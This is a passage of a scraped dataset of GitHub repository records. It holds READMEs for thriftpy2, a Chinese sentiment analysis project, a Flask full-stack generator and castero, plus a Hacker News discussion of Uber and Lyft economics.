image:: https://img.shields.io/codecov/c/github/Thriftpy/thriftpy2.svg\n :target: https://codecov.io/gh/Thriftpy/thriftpy2\n\n.. image:: https://img.shields.io/pypi/dm/thriftpy2.svg\n :target: https://pypi.org/project/thriftpy2/\n\n.. image:: https://img.shields.io/pypi/v/thriftpy2.svg\n :target: https://pypi.org/project/thriftpy2/\n\n.. image:: https://img.shields.io/pypi/pyversions/thriftpy2.svg\n :target: https://pypi.org/project/thriftpy2/\n\n.. image:: https://img.shields.io/pypi/implementation/thriftpy2.svg\n :target: https://pypi.org/project/thriftpy2/\n\n\nThriftPy: https://github.com/eleme/thriftpy has been deprecated, ThriftPy2 aims to provide long term support.\n\n\nMigrate from Thriftpy?\n======================\n\nAll you need is:\n\n.. code:: python\n\n import thriftpy2 as thriftpy\n\n\nThat's it! thriftpy2 is fully compatible with thriftpy.\n\n\nInstallation\n============\n\nInstall with pip.\n\n.. code:: bash\n\n $ pip install thriftpy2\n\nYou may also install cython first to build cython extension locally.\n\n.. code:: bash\n\n $ pip install cython thriftpy2\n\n\nCode Demo\n=========\n\nThriftPy make it super easy to write server/client code with thrift. Let's\ncheckout this simple pingpong service demo.\n\nWe need a 'pingpong.thrift' file:\n\n::\n\n service PingPong {\n string ping(),\n }\n\nThen we can make a server:\n\n.. code:: python\n\n import thriftpy2\n pingpong_thrift = thriftpy2.load(\"pingpong.thrift\", module_name=\"pingpong_thrift\")\n\n from thriftpy2.rpc import make_server\n\n class Dispatcher(object):\n def ping(self):\n return \"pong\"\n\n server = make_server(pingpong_thrift.PingPong, Dispatcher(), '127.0.0.1', 6000)\n server.serve()\n\nAnd a client:\n\n.. code:: python\n\n import thriftpy2\n pingpong_thrift = thriftpy2.load(\"pingpong.thrift\", module_name=\"pingpong_thrift\")\n\n from thriftpy2.rpc import make_client\n\n client = make_client(pingpong_thrift.PingPong, '127.0.0.1', 6000)\n print(client.ping())\n\nAnd it also supports asyncio on Python 3.5 or later:\n\n.. code:: python\n\n import thriftpy2\n import asyncio\n from thriftpy2.rpc import make_aio_client\n\n\n echo_thrift = thriftpy2.load(\"echo.thrift\", module_name=\"echo_thrift\")\n\n\n async def request():\n client = await make_aio_client(\n echo_thrift.EchoService, '127.0.0.1', 6000)\n print(await client.echo('hello, world'))\n client.close()\n\n.. code:: python\n\n import asyncio\n import thriftpy2\n\n from thriftpy2.rpc import make_aio_server\n\n echo_thrift = thriftpy2.load(\"echo.thrift\", module_name=\"echo_thrift\")\n\n\n class Dispatcher(object):\n async def echo(self, param):\n print(param)\n await asyncio.sleep(0.1)\n return param\n\n\n def main():\n server = make_aio_server(\n echo_thrift.EchoService, Dispatcher(), '127.0.0.1', 6000)\n server.serve()\n\n\n if __name__ == '__main__':\n main()\n\nSee, it's that easy!\n\nYou can refer to 'examples' and 'tests' directory in source code for more\nusage examples.\n\n\nFeatures\n========\n\nCurrently ThriftPy have these features (also advantages over the upstream\npython lib):\n\n- Supports Python 2.7, Python 3.4+, PyPy and PyPy3.\n\n- Pure python implementation. No longer need to compile & install the 'thrift'\n package. All you need is thriftpy2 and thrift file.\n\n- Compatible with Apache Thrift. 
You can use ThriftPy together with the\n official implementation servers and clients, such as a upstream server with\n a thriftpy2 client or the opposite.\n\n Currently implemented protocols and transports:\n\n * binary protocol (python and cython)\n\n * compact protocol (python and cython)\n\n * json protocol\n\n * Apache JSON protocol compatible with apache thrift distribution's JSON protocol.\n Simply do ``from thriftpy2.protocol import TApacheJSONProtocolFactory`` and pass\n this to the ``proto_factory`` argument where appropriate.\n\n * buffered transport (python & cython)\n\n * framed transport\n\n * tornado server and client (with tornado 4.0)\n\n * http server and client\n\n * asyncio support (python 3.5 or later)\n\n- Can directly load thrift file as module, the sdk code will be generated on\n the fly.\n\n For example, ``pingpong_thrift = thriftpy2.load(\"pingpong.thrift\", module_name=\"pingpong_thrift\")``\n will load 'pingpong.thrift' as 'pingpong_thrift' module.\n\n Or, when import hook enabled by ``thriftpy2.install_import_hook()``, you can\n directly use ``import pingpong_thrift`` to import the 'pingpong.thrift' file\n as module, you may also use ``from pingpong_thrift import PingService`` to\n import specific object from the thrift module.\n\n- Easy RPC server/client setup.\n\n\n\nContribute\n==========\n\n1. Fork the repo and make changes.\n\n2. Write a test which shows a bug was fixed or the feature works as expected.\n\n3. Make sure ``travis-ci`` or ``tox`` tests succeed.\n\n4. Send pull request.\n\n\nContributors\n============\n\nhttps://github.com/Thriftpy/thriftpy2/graphs/contributors\n\n\nSponsors:\n============\n\n.. image:: ./docs/jetbrains.svg\n :target: https://www.jetbrains.com/?from=ThriftPy\n\n\nChangelog\n=========\n\nhttps://github.com/Thriftpy/thriftpy2/blob/master/CHANGES.rst\n", "readme_type": "rst", "hn_comments": "Shocker! A product is more popular that is sold below cost and you actually need to charge more for a product than it costs to produce?In third world countries like India, Uber and Lyft cannot compete with it\u2019s street smart drives. Drivers call you and ask you to cancel the trip and pay them in cash to take you to the destination. They use Uber/Lyft marketing, tracking, and status but give zero dollars in revenue back.I think we're about to see a lot of tech ideas with questionable economics come back to earth. When the cost of capital was below a single digit, \"parking\" money in a growth bet could vaguely make sense. After all, someday Uber would figure it out, or get AVs, or .. something? Better than leaving the money in a .01% money market for 10 years, or parking the money in something with no path for growth like industrials.This problem isn't restricted to startups however, even big tech has big expensive forays into questionable markets. Meta is building something for a few billion a year, Google has hundreds of strange an unprofitable businesses, and B2B SaaS is full of startups which may actually just be consultancies.A 10-12% cost of capital means that you either need to have a real plan to turn profit in 3 years or investors won't care. 
Just breaking even means an opportunity cost of 30%.Let's not forget that this kind of venture also destroys the business it was meant to disrupt, at least while the venture money is flowing.Uncreative distruction.Somehow it seems wrong that people can make enough money to buy an island without actually making money.Totally unsurprising and still both unprofitable businesses (Lyft, and Uber) 3 years after IPO. [0][0] https://news.ycombinator.com/item?id=21328967My favorite feature of Uber and Lyft the last several years is that it's essentially a crowdsourced way to transfer wealth from VCs to random users.Operating every drive at a loss means the rider and drivers benefit and the person holding the bag is some VC who apparently has more money than they know what to do with. Given how many financial structures today seem to flow in the opposite direction and skim a little money from everyone to transfer it to the already-rich, it's nice seeing a system that (completely unintentionally) flows the other way.The P2P transportation market is an ideal one for a workers' cooperative. The fact that Uber and Lyft are running at a loss (...for now) does not make them any less rent-seeking in their business model.https://drivers.coop/https://ridefair.io/I would like to read an explanation for how Uber and Lyft can't be profitable when taxicab companies can be.The broker model has a yes out in the transportation industry, before Uber and Lyft were a twinkle in someones eye. It's a low margin business and has gained efficiency through tech. Once we understand that the gross margins are probably 20%, you are scalping the drivers and no driver can exist successfully living off brokered rides alone, Uber and Lyft will price like CH Robinson. 25.\n Uber and Lyft Are Out of Ideas, Jacking Up Prices in Desperation for Profit (vice.com)\n 127 points by elsewhen 2 hours ago | flag | hide | 179 comments\n\nAbove is what I saw on the HN front page minutes ago. Then I started reading the comments thread and suddenly the submitted article has changed. It is now pointing to WSJ instead of VICE.Looks like the original VICE article has even been scrubbed from HN entirely.https://news.ycombinator.com/from?site=vice.comBelow is the original article.https://www.vice.com/en/article/m7vmpb/uber-and-lyft-are-out...\u201cI\u2019m not loyal,\u201d said Sergio Avedian, who has driven for seven apps, including Uber and Lyft, and writes about his experience on The RideShare Guy blog for drivers. \u201cNobody is loyal.\u201d> the current business model passes off nearly all of the costs of actually running a taxi company onto drivers who pay for their own cars, fuel, and insurance, whereas AVs would have meant both companies would be paying for those things, but that\u2019s a moot point nowI know that Vice is a meme these days, but I can't resist. Where do they think the money is going? Mostly to the fees that are paid to drivers. If those costs are baked in and they are still losing money, it's because they're paying the drivers more than they can afford. They were banking on not having to pay AV drivers wages, sick leave, pensions, have them go on strike, etc etc. Just provide customers a good service for an amount these companies could sustain.Now, that was a wild bet for sure, but not a bad one for humanity to have tried.Here's my question: how much will this hurt AWS? Oh, Uber and Lyft alone won't, of course, even though IIRC their IPO's revealed staggering AWS bills. 
But, there are a lot of goofy ideas out there masquerading as companies, and the VC spigot just turned off. That spigot was pushing VC money, via a very complex system of middlemen, to AWS.If AWS has half their customers disappear, what does that do to Amazon's bottom line?Of course they need to make money, they cant subsidise everyone foreverUrl changed from https://www.vice.com/en/article/m7vmpb/uber-and-lyft-are-out..., which points to this.I don't use Uber. In my country we have a taxi app which can be used by any taxi driver. So I do have the benefits of Uber - using an app, having a larger pool of drivers to pick from, paying the ride through the app, without any of the downsides of using Uber.The taxi drivers follow local regulations, they have the proper permit to transport people (this requires checking), I don't see ridicoluos price surges and price hikes at rush hours, taxi companies don't evade local taxes like Uber does, the money remain in the local economy, drivers have wages, social insurance, health insurance and pension funds.Uber and Lyft already dumped their bags on your 401k.Former Lyft engineer here. I'm convinced they will go out of business or sell the scraps to someone... however smart acquirers like Elon wouldn't go near it. Rideshare sucks.If you\u2019re arriving at an airport or other high traffic area, you will almost always get a better price and timelier service by simply jumping in a standard taxi. I\u2019d say this has been the case for at least 6-9 months.https://archive.ph/bt3bAI think we need to stop comparing Uber to Lyft. To me, this is more of a Lyft problem as Uber has diversified way more.I've had over 10,000 Uber rides, all black, some SUV since 2011. I would have no problem if they just focused on the higher end of the market where there's profit to be made. I never thought their going down market was a good idea.These companies were always net value destroyers. Consumers being subsidized from the pockets of investors was nice while it lasted, but it doesn't make for a sustainable business. Once they go to zero we'll wonder how it ever even appeared to make sense.This was always the idea. I remember Jason Calacanis saying on This Week In Startups months ago that Uber is in growth mode, eventually when push comes to shove they'll increase the price to get to profitability and have the market share to stick it out.Increased by how much?Uber is just a dumpster fire. I scheduled an airport ride with them and each driver continuously just kept canceling it when they saw where it was going. Can't imagine how bad it is for someone going to a lower level neighborhood.Can't count on it anymore - going back to manually calling taxis.I just do not understand how ridesharing cannot turn a profit. Let's look at unit economics:~25% take rate on a ride ($15 average): $3.75 takePayment processing: 2.5% + 30c = $0.68Servers / datacenters: $0.20 (for a margin-sensitive business, you should be colo'ing your own servers, or using cheap alternatives like OVH/Hertzner)Customer support: Automate as much as possible (auto refunds up to a certain point; for lost items, connect directly to driver); assume 1 in 50 rides require manual human support with a $3 cost = $0.06 support cost per rideFraud/refunds: Assume a 2% fraud rate that cannot be reclaimed; thus $0.30 cost for fraud. Refunds for things like driver purposefully took a longer route can be clawed from the driver.Gross COGS: $1.24Gross profit: $2.51What am I missing?? Marketing? 
Fuck marketing when you can't turn a profit. Everyone knows about Uber or Lyft already, you need to turn a profit, not waste $30 per CAC.I recently got a ridiculous coupon code for 50% off Postmates (Uber Eats) orders, when I did a Google search for Postmates. 5 orders, up to $100 savings on each order, and the code worked on my wife's account too so we get 10 orders. For weeks I've been ordering $200 meals from fancy steakhouses and paying $100, with leftovers for days. Somehow they haven't stopped subsidizing their customers yet.The code is FEAST if anyone cares to try it. Probably expired by now. It doesn't seem to work on Uber Eats, only Postmates.com on desktop web.So have they hit price-parity with traditional taxis, yet?After Uber and Lyft will fall, I can see a better model coming up.An open source base for a riding/taxi app for which local companies can add their own modules for billing to comply with local regulations.It would be the WordPress of ride sharing / taxi apps.I've been noticing more drivers going independent. When I landed at LAX recently and waited at the taxi area for a Lyft, there were a bunch of drivers coming up and offering people rides, but not through Uber or Lyft. I thought \"why not\", took one of these independent rides home, and paid the guy through Square. It wasn't a \"cheap\" ride, but it was cheaper than the Lyft ride I cancelled and I'm sure he made a greater profit than through a \"ride share\" company.That's just one example, but I've noticed this drastically increase in the last year. Whether I'm at the airport, a train station, or a bus depot, I've been seeing way more independent drivers.What's stopping more drivers from doing this? If it's the \"trust\" aspect that comes from Uber, then surely there's some system that can meet us halfway that doesn't apparently need large sums of VC money and high fees but at least provides trust and safety for riders.So does this mean it's going to begin to become cheaper to use the services of old taxi organizations, who arguably aren't going to have the shareholders to appease to to pad revenues with profits?I really think, in all cases of online platforms, that laws requiring the platform to be transparent with all costs - including how much they keep as a platform, how much they give the actual driver, how much the restaurant gets (if doing delivery) etc. would be highly beneficial, if not necessary, to not only society but also to potential investors.E.g. How sustainable are their prices, and are the billions invested simply subsidizing lower fares to outcompete based on price for a temporary time while fighting over to capture as much of a market (artificially and temporarily?) until the shareholders come knocking asking for the profit tap to get turned on?Here in India, its increasingly starting to feel that both Ola and Uber are slowly abandoning the market. Service quality has gone down drastically and Ola seems more interested in making (unsafe) electric scootersIn their heyday, you\u2019d drive around and find that 30-40% of cars on the road were Uber/Ola taxis (cabs here have different colored number plates). Now, its around 5-10%Seems unsurprising. The check had to come due eventually. It\u2019ll be interesting to see whether riders keep using it in enough volume to keep them afloat.So they made a full circle ... 
back to taxis?> The fundamental problem Uber and Lyft keep running into is that most people are not willing to pay the fares it would cost to run a profitable taxi service with the overhead Uber and Lyft require[surprisedpikachu.gif]This was inevitable without automation right?Western countries have such a weird problemA seemingly boring business seems unviable.For example, food is expensive, and we have to tip, but restaurant is tough business, and the servers don't make enough for living. Like why the heck is this not viable?At markets where Uber has competition. I know Brazil and Mexico. DiDi pays driver more and charges client less. So DiDi takes less cut than Uber and is still profitable.Are traditional taxicab services still alive? How did they survive until this time?I wonder how much of this transfers to the music industry. It's much more complicated than the taxi industry, but in broad strokes, VC-subsidized companies basically undercut the combination of record publishers and musicians, setting the price and revenue-per-listen to levels much lower than they would have been without subsidization. But it's also been happening for longer, so I think that it's more like as-if all the taxi drivers had already been driven out of the business and the taxis junked. With taxis, you know if there are no rides available, but with music, you don't really realize all the great music that isn't being written.I love threads like this. It assured me of job security in accounting y'all. Thanks for giving me confidence in strange quarters.I always figured by now there would be some sort of centralized \"trust\" entity, ala credit bureaus, where you can build apps on top of that using the same \"trust\".Supposing such a thing existed, then drivers could simply offer their own driving services by themselves. Perhaps that's the next evolution here.I used to drive a pretty boring, but predictable route in the morning and in the late afternoon. I would've loved to drive people who are near my destination both ways, but without anyway to trust them, no way.Surely someone has tried to implement this before and failed and I just don't know?I can proudly say that I've NEVER ONCE used these NeoSlavery services and never will.There's a talk a couple years old now by an Uber engineer called something like \"what I wish I knew before scaling to 10k microservices\", I haven't watched it in a while but when I saw it I remember thinking \"these people are absolutely insane\". I've since heard some crazy stories about things like new services being built because people would rather build a new service than talk to the devs that owned the existing one. I don't know if this is true or not or how widespread this was, but the impression I get is that Uber has massively over-built in an effort to look more like a \"tech\" company rather than a \"taxi\" company to investors.We have a couple of local companies in NY with their own ride-sharing apps. 
They aren't as polished as Uber, but they do work and the companies that built them have about 1% the staff of Uber.VCs are never getting this money back.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "linguishi/chinese_sentiment", "link": "https://github.com/linguishi/chinese_sentiment", "tags": [], "stars": 518, "description": "\u4e2d\u6587\u60c5\u611f\u5206\u6790\uff0cCNN\uff0cBI-LSTM\uff0c\u6587\u672c\u5206\u7c7b", "lang": "Python", "repo_lang": "", "readme": "# Chinese sentiment analysis\n\nThe essence of Chinese sentiment analysis is the problem of text classification. This project uses **CNN** and **BI-LSTM** two models to solve text classification tasks, and use them for sentiment analysis to achieve good results.\nThe two models are trained on a small data set, and the accuracy rate, number return rate and F1 factor in the verification set are close to **90%**\n\nThe goal of the project design is to accept multiple classification tasks from different corpora. As long as the corpus is prepared in a specific format, parameter adjustment training, export, and serving can begin.\n\n### code environment\nWorks fine under python3.6 & Tensorflow1.13\n\nOther environments may also work, but have not been tested.\n\nYou also need to install the `scikit-learn` package to calculate metrics, including precision-recall and F1 factors, etc.\n\n### Corpus preparation\nThe choice of corpus is *Tan Songbo\u2019s commentary corpus*, with 2000 positive and negative examples each. Belonging to a smaller dataset, this project contains the original corpus, located in `data/hotel_comment/raw_data/corpus.zip`\n\nRun after decompressing `corpus.zip`, and run it on `raw_data`\n```sh\npython fix_corpus.py\n```\nConvert the original `gb2312` encoded file to `utf-8` encoded file.\n\n### Preparation of word vector\nThis experiment uses open source word vectors [*chinese-word-vectors*](https://github.com/Embedding/Chinese-Word-Vectors)\n\nSelect the Word Vector trained by Zhihu corpus. The download address of the selected word vector for this project is https://pan.baidu.com/s/1OQ6fQLCgqT43WTwh5fh_lg, which needs to be downloaded from Baidu Cloud, decompressed, and placed directly in the project directory\n\n### Format of training data\nRefer to `data/hotel_comment/*.txt` files\n\n- step1\n\nThis project divides the data into training set and test set, the ratio is `4:1`, the set of 4000 samples is separated, the training set of 3200 samples, and the verification set of 800.\n\nFor the training set and validation set, follow the format below when making training data:\nIn the `{}.words.txt` file, each line is an input of a sample, and each paragraph is commented on a line, and `jieba` is used to divide words, and words are separated by spaces.\n```text\nExcept for the good location, the others are in a mess and appalling. Almost like a guest house.\nI booked a hotel for my colleague. His brother just came back from Dongguan, and I asked him about his impression of Guangdong Hotel in detail. He said that the hardware and software are excellent! 
So I would like to praise it\n```\nIn the `{}.labels.txt` file, each line is a label for a sample\n```text\nNEG\nPOS\n```\nIn this project, you can run `build_data.py` in the `data/hotel_comment` directory to get the corresponding format\n\n-step2\n\nBecause this project uses `index_table_from_file` to obtain the id corresponding to the character, two files are required to represent the vocabulary set and the flag set, corresponding to `vocab.labels.txt` and `vocab.words.txt`, where each line represents a word Or a row for a flag.\n\nIn this project, you can run `build_vocab.py` in the `data/hotel_comment` directory to get the corresponding files\n\n- step3\n\nSince the downloaded word vector is very huge, it is necessary to extract the vector corresponding to the characters appearing in the training corpus, which corresponds to the `data/hotel_comment/w2v.npz` file in this project\n\nIn this project, you can run `build_embeddings.py` in the `data/hotel_comment` directory to get the corresponding files\n\n## Model 1: CNN\n#### Structure:\n1. Chinese word Embedding\n2. Multiple fixed-width convolution kernels of different lengths\n3. The maximum pooling layer, each filter output only takes a maximum value\n4. Fully connected\n\n ![Screenshot](https://raw.githubusercontent.com/linguishi/chinese_sentiment/master/pic/%E6%88%AA%E5%9B%BE_%E9%80%89%E6%8B%A9%E5% 8C%BA%E5%9F%9F_20211202181126.png)\nThe picture comes from the paper https://arxiv.org/abs/1408.5882 , but unlike the paper, the paper adopts a pre-train embeddings and an untrained embeddings to form a dual channel similar to the image concept. Only a single channel of pre-trained embeddings is used in this project.\n\nCNN model training, run under the `cnn` directory\n```\npython main.py\n```\n\n#### CNN model training time\nIt takes about 2 minutes under the blessing of **GTX 1060 6G**\n\n#### CNN model training results\nRun under the `model` directory\n\n```\npython score_report.py cnn/results/score/eval.preds.txt\n```\n\noutput:\n```\n precision recall f1-score support\n\n POS 0.91 0.87 0.89 400\n NEG 0.88 0.91 0.89 400\n\n micro avg 0.89 0.89 0.89 800\n macro avg 0.89 0.89 0.89 800\nweighted avg 0.89 0.89 0.89 800\n\n```\n\n## Model 2: BI-LSTM\n1. Chinese word Embedding\n2. bi-lstm\n3. Fully connected\n\n![Screenshot](https://raw.githubusercontent.com/linguishi/chinese_sentiment/master/pic/1_GRQ91HNASB7MAJPTTlVvfw.jpeg)\n\n\nBI-LSTM model training, run under the `lstm` directory\n```\npython main.py\n```\n\n#### BI-LSTM model training time\nIt took about 5 minutes under the blessing of **GTX 1060 6G**\n\n#### BI-LSTM model training results\nRun under the `model` directory\n\n```\npython score_report.py lstm/results/score/eval.preds.txt\n```\n\noutput:\n```\n precision recall f1-score support\n\n POS 0.90 0.87 0.88 400\n NEG 0.87 0.91 0.89 400\n\n micro avg 0.89 0.89 0.89 800\n macro avg 0.89 0.89 0.89 800\nweighted avg 0.89 0.89 0.89 800\n\n```\n\n### Model export and serving (BI-LSTM as an example)\n#### Model Export\nRun under the `lstm` directory\n```\npython export.py\n```\nExport `estimator` inference graph, which can be used as prediction. This project has uploaded `saved_model`, which can be tested directly without training.\n\nRun `python serve.py` under the `model/lstm` directory to use the exported model for entity recognition. 
See code for details.\n\nTest Results\n\n![Screenshot](https://raw.githubusercontent.com/linguishi/chinese_sentiment/master/pic/clip.png)\n\nAlthough the model is trained from real comment data, the length of these data varies (some word segmentation length exceeds 1000), but from the above figure, the model can perform well on short comments.\n\n ## refer to\n \n [1] http://www.wildml.com/2015/12/implementing-a-cnn-for-text-classification-in-tensorflow/\n \n [2] https://arxiv.org/abs/1408.5882", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "tiangolo/full-stack", "link": "https://github.com/tiangolo/full-stack", "tags": ["python", "flask", "docker", "traefik", "letsencrypt", "swagger", "celery", "sqlalchemy", "api", "jwt", "angular", "cookiecutter", "generator", "swarm-mode", "token-authetication", "webargs", "marshmallow", "postgresql", "pgadmin", "apispec"], "stars": 515, "description": "Full stack, modern web application generator. Using Flask, PostgreSQL DB, Docker, Swagger, automatic HTTPS and more.", "lang": "Python", "repo_lang": "", "readme": "## \ud83d\udea8 DEPRECATION WARNING \ud83d\udea8\n\nAs [**FastAPI**](https://github.com/tiangolo/fastapi) and the [equivalent project generator](https://github.com/tiangolo/full-stack-fastapi-postgresql) provide a much better solution to all the use cases this project was built for, all the future development will be done there.\n\nYou are still free to use this project, but it won't receive any new features, changes, or bug fixes.\n\nIf you are starting a new project from scratch, check the alternatives at the [FastAPI docs: Project Generation](https://fastapi.tiangolo.com/project-generation/).\n\n# Full Stack Flask and PostgreSQL - Base Project Generator\n\n[![Build Status](https://travis-ci.org/tiangolo/full-stack.svg?branch=master)](https://travis-ci.org/tiangolo/full-stack)\n\nGenerate a backend and frontend stack using Python, including interactive API documentation.\n\n[![Screenshot](screenshot.png)](https://github.com/tiangolo/full-stack)\n\n## Notice: Flask or [FastAPI](https://github.com/tiangolo/fastapi)\n\nIf you are using this project (or Flask in general to create web APIs) you would probably benefit more from [FastAPI](https://github.com/tiangolo/fastapi).\n\nYou can use the equivalent sibling project generator based on **FastAPI**: [https://github.com/tiangolo/full-stack-fastapi-postgresql](https://github.com/tiangolo/full-stack-fastapi-postgresql). It also has more features than this one.\n\n**FastAPI** was created from the learnings acquired while creating and using these project generators for Flask, with all the plug-ins and ideas.\n\n* **FastAPI** (and its project generators), would give you about 800% (8x) the performance achievable with this one.\n* Writing code in **FastAPI** is about 200% to 300% faster. 
Because you write a lot less code, it is designed for web APIs, and you have auto-complete everywhere.\n* About 40% of the human (developer) induced errors can be reduced (**FastAPI** does a lot of the data validation, conversion and documentation for you).\n\n---\n\n## Features\n\n* Full **Docker** integration (Docker based)\n* Docker Swarm Mode deployment\n* **Docker Compose** integration and optimization for local development\n* **Production ready** Python web server using Nginx and uWSGI\n* Python **Flask** backend with:\n * **Flask-apispec**: Swagger live documentation generation\n * **Marshmallow**: model and data serialization (convert model objects to JSON)\n * **Webargs**: parse, validate and document inputs to the endpoint / route\n * **Secure password** hashing by default\n * **JWT token** authentication\n * **SQLAlchemy** models (independent of Flask extensions, so they can be used with Celery workers directly)\n * Basic starting models for users and groups (modify and remove as you need)\n * **Alembic** migrations\n * **CORS** (Cross Origin Resource Sharing)\n* **Celery** worker that can import and use models and code from the rest of the backend selectively (you don't have to install the complete app in each worker)\n* REST backend tests based on **Pytest**, integrated with Docker, so you can test the full API interaction, independent on the database. As it runs in Docker, it can build a new data store from scratch each time (so you can use ElasticSearch, MongoDB, CouchDB, or whatever you want, and just test that the API works)\n* Easy Python integration with **Jupyter Kernels** for remote or in-Docker development with extensions like Atom Hydrogen or Visual Studio Code Jupyter\n* Vue frontend:\n * Generated with **Vue CLI**\n * JWT Authentication handling\n * Login view\n * After login, main dashboard view\n * **Vuex**\n * **Vue-router**\n * **Vuetify** for beautiful material design components\n * **TypeScript**\n * Docker server based on **Nginx** (configured to play nicely with Vue-router)\n * Docker multi-stage building, so you don't need to save or commit compiled code\n * Frontend tests ran at build time (can be disabled too)\n * Made as modular as possible, so it works out of the box, but you can re-generate with Vue CLI or create it as you need, and re-use what you want\n* **PGAdmin** for PostgreSQL database, you can modify it to use PHPMyAdmin and MySQL easily\n* **Swagger-UI** for live interactive documentation\n* **Flower** for Celery jobs monitoring\n* Load balancing between frontend and backend with **Traefik**, so you can have both under the same domain, separated by path, but served by different containers\n* Traefik integration, including Let's Encrypt **HTTPS** certificates automatic generation\n* **GitLab CI** (continuous integration), including frontend and backend testing\n\n## How to use it\n\nGo to the directoy where you want to create your project and run:\n\n```bash\npip install cookiecutter\ncookiecutter https://github.com/tiangolo/full-stack\n```\n\n### Generate passwords\n\nYou will be asked to provide passwords and secret keys for several components. Open another terminal and run:\n\n```bash\nopenssl rand -hex 32\n# Outputs something like: 99d3b1f01aa639e4a76f4fc281fc834747a543720ba4c8a8648ba755aef9be7f\n```\n\nCopy the contents and use that as password / secret key. 
And run that again to generate another secure key.\n\n\n### Input variables\n\nThe generator (cookiecutter) will ask you for some data, you might want to have at hand before generating the project.\n\nThe input variables, with their default values (some auto generated) are:\n\n* `project_name`: The name of the project\n* `project_slug`: The development friendly name of the project. By default, based on the project name\n* `domain_main`: The domain in where to deploy the project for production (from the branch `production`), used by the load balancer, backend, etc. By default, based on the project slug.\n* `domain_staging`: The domain in where to deploy while staging (before production) (from the branch `master`). By default, based on the main domain.\n\n* `docker_swarm_stack_name_main`: The name of the stack while deploying to Docker in Swarm mode for production. By default, based on the domain.\n* `docker_swarm_stack_name_staging`: The name of the stack while deploying to Docker in Swarm mode for staging. By default, based on the domain.\n\n* `secret_key`: Backend server secret key. Use the method above to generate it.\n* `first_superuser`: The first superuser generated, with it you will be able to create more users, etc. By default, based on the domain.\n* `first_superuser_password`: First superuser password. Use the method above to generate it.\n* `backend_cors_origins`: Origins (domains, more or less) that are enabled for CORS (Cross Origin Resource Sharing). This allows a frontend in one domain (e.g. `https://dashboard.example.com`) to communicate with this backend, that could be living in another domain (e.g. `https://api.example.com`). It can also be used to allow your local frontend (with a custom `hosts` domain mapping, as described in the project's `README.md`) that could be living in `http://dev.example.com:8080` to cummunicate with the backend at `https://stag.example.com`. Notice the `http` vs `https` and the `dev.` prefix for local development vs the \"staging\" `stag.` prefix. By default, it includes origins for production, staging and development, with ports commonly used during local development by several popular frontend frameworks (Vue with `:8080`, React, Angular).\n \n* `postgres_password`: Postgres database password. Use the method above to generate it. (You could easily modify it to use MySQL, MariaDB, etc).\n* `pgadmin_default_user`: PGAdmin default user, to log-in to the PGAdmin interface.\n* `pgadmin_default_user_password`: PGAdmin default user password. Generate it with the method above.\n \n* `traefik_constraint_tag`: The tag to be used by the internal Traefik load balancer (for example, to divide requests between backend and frontend) for production. Used to separate this stack from any other stack you might have. This should identify each stack in each environment (production, staging, etc).\n* `traefik_constraint_tag_staging`: The Traefik tag to be used while on staging. \n* `traefik_public_network`: This assumes you have another separate publicly facing Traefik at the server / cluster level. This is the network that main Traefik lives in.\n* `traefik_public_constraint_tag`: The tag that should be used by stack services that should communicate with the public.\n\n* `flower_auth`: Basic HTTP authentication for flower, in the form`user:password`. By default: \"`root:changethis`\".\n\n* `sentry_dsn`: Key URL (DSN) of Sentry, for live error reporting. If you are not using it yet, you should, is open source. 
E.g.: `https://1234abcd:5678ef@sentry.example.com/30`.\n\n* `docker_image_prefix`: Prefix to use for Docker image names. If you are using GitLab Docker registry it would be based on your code repository. E.g.: `git.example.com/development-team/my-awesome-project/`.\n* `docker_image_backend`: Docker image name for the backend. By default, it will be based on your Docker image prefix, e.g.: `git.example.com/development-team/my-awesome-project/backend`. And depending on your environment, a different tag will be appended ( `prod`, `stag`, `branch` ). So, the final image names used will be like: `git.example.com/development-team/my-awesome-project/backend:prod`.\n* `docker_image_celeryworker`: Docker image for the celery worker. By default, based on your Docker image prefix.\n* `docker_image_frontend`: Docker image for the frontend. By default, based on your Docker image prefix.\n\n## How to deploy\n\nThis stack can be adjusted and used with several deployment options that are compatible with Docker Compose, but it is designed to be used in a cluster controlled with pure Docker in Swarm Mode with a Traefik main load balancer proxy handling automatic HTTPS certificates, using the ideas from DockerSwarm.rocks.\n\nPlease refer to DockerSwarm.rocks to see how to deploy such a cluster in 20 minutes.\n\n## More details\n\nAfter using this generator, your new project (the directory created) will contain an extensive `README.md` with instructions for development, deployment, etc. You can pre-read [the project `README.md` template here too](./{{cookiecutter.project_slug}}/README.md).\n\n## History\n\n**Note about Angular**: a previous version of this project generated a basic default Angular frontend application, but without any view or interaction with the rest of the stack (the backend API). I recently switched to Vue for frontend and used it to created the basic frontend views for this project (that didn't exist before). 
If you are interested in keeping the Angular version, let me know in an issue, I can create an Angular version of the project (without the current default views), then you can integrate your Angular app with the basic `Dockerfile` and additional files.\n\nThis project was based on [senseta-os/senseta-base-project](https://github.com/senseta-os/senseta-base-project).\n\nAs [I was the only maintainer](https://github.com/tiangolo), I'm continuing the development in this fork (https://github.com/tiangolo/full-stack).\n\n## License\n\nThis project is licensed under the terms of the MIT license.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "xgi/castero", "link": "https://github.com/xgi/castero", "tags": ["podcast-client", "podcast", "command-line", "terminal", "tui", "curses", "hacktoberfest"], "stars": 515, "description": "TUI podcast client for the terminal", "lang": "Python", "repo_lang": "", "readme": "# castero\n\n[![GitHub release](https://img.shields.io/github/release/xgi/castero.svg?style=flat-square)](https://github.com/xgi/castero/releases) [![PyPI](https://img.shields.io/pypi/v/castero.svg?style=flat-square)](https://pypi.org/project/castero) [![GitHub Build](https://img.shields.io/github/workflow/status/xgi/castero/CI?style=flat-square)](https://circleci.com/gh/xgi/castero/tree/master) [![Maintainability](https://api.codeclimate.com/v1/badges/babcaad5cb2cca266c92/maintainability)](https://codeclimate.com/github/xgi/castero/maintainability) [![Test Coverage](https://api.codeclimate.com/v1/badges/babcaad5cb2cca266c92/test_coverage)](https://codeclimate.com/github/xgi/castero/test_coverage)\n\ncastero is a TUI podcast client for the terminal.\n\n![example client screenshot](https://raw.githubusercontent.com/xgi/castero/master/res/client_example.png)\n\n## Installation\n\nInstall from [PyPi](https://pypi.org/project/castero) with pip:\n\n```bash\n$ pip3 install castero\n```\n\nUpgrading:\n\n```bash\n$ pip3 install castero --upgrade\n```\n\n### Manual 